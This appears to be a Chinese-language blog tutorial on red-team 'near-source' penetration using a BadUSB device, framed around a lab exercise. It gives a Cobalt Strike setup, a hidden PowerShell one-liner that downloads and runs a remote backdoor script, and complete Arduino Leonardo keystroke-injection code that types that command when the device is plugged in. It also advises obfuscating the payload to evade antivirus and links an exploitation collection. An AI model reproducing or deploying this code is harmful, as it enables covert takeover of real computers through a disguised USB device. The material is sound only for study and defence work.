|
随着攻防演练不断的变化,不同于以往只通过网络进行传统攻击的方式,近源渗透测试是指攻击人员靠近或者位于攻击目标内部,利用各类智能设备、通信技术、物理接口等方法进行突破。HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口,只要符合HID类别规范的设备都是HID设备。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。前段时间看过一段新闻,国外安全研究员发现黑客组织FIN7(主要攻击酒店和零售业的APT组织。)将BADUSB伪装礼品卡对目标发起攻击。 
黑客通过给客户寄BADUSB,当用户将其插入电脑后,会自动执行powershell脚本,下载并植入恶意程序,从而控制目标主机,下图为攻击流程。
实验环境所需: CobaltStrike BadUsb arduino IDE 目标机器 ./teamserver vps 的 ip 设置用于登录团队服务器的密码 指定 profile[暂时可不指定,直接使用默认的 profile]。
javaw -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
( 4 ) 生成powershell后门下载链接
powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('http://192.168.0.106:80/badusb'))'
通过CobaltStrike将生成的PowerShell文件文件部署到站点上:
http://192.168.0.106:808/badusb.ps1badusb插入电脑 打开Arduino IDE 工具->开发板->选择“Arduino Leonardo” 工具->端口>选择“COM* (Arduino Leonardo)” 现在可以看到IDE右下角出现“Arduino Leonardo on COM*”
#include<Keyboard.h>void setup(){Keyboard.begin(); //开始键盘通讯delay(1000); //延时Keyboard.press(KEY_LEFT_GUI); //win键Keyboard.press('r');//r键delay(500);Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r');delay(500);Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法Keyboard.release(KEY_CAPS_LOCK);delay(300);Keyboard.println('cmd.exe /c powershell.exe IEX(New-ObjectNet.WebClient).DownloadString('http://192.168.0.106:808/badusb.ps1')');Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);delay(500);Keyboard.end();//结束键盘通讯}void loop(){
}
攻击流程比较简单,直接插入目标主机的USB接口即可上线。实施过程中有几点需要注意:( 1 ) Windows7系统主机默认没有安装驱动,需要手动加载驱动。( 2 ) 主机需要有公网IP地址,可以正常连接到CS服务器( 3 ) 运行powershell,需要进行混淆免杀等bypass操作,正常情况下执行powershell,杀软会拦截。( 4 ) 见机行事,不行就跑。以免被目标客户打断腿从而造成不必要的损失。
整体流程比较简单,可利用的方式比较多,之前收藏过前辈们发的一个关于badusb的利用方式大全,需要的请自取,侵删:链接: https://pan.baidu.com/s/1co7DrN2tIM7sqNX_1KWvhw 密码: 5psq
参考链接:https://blog.csdn.net/weixin_43211186?t=1https://www.jianshu.com/p/7afdc002f321
|
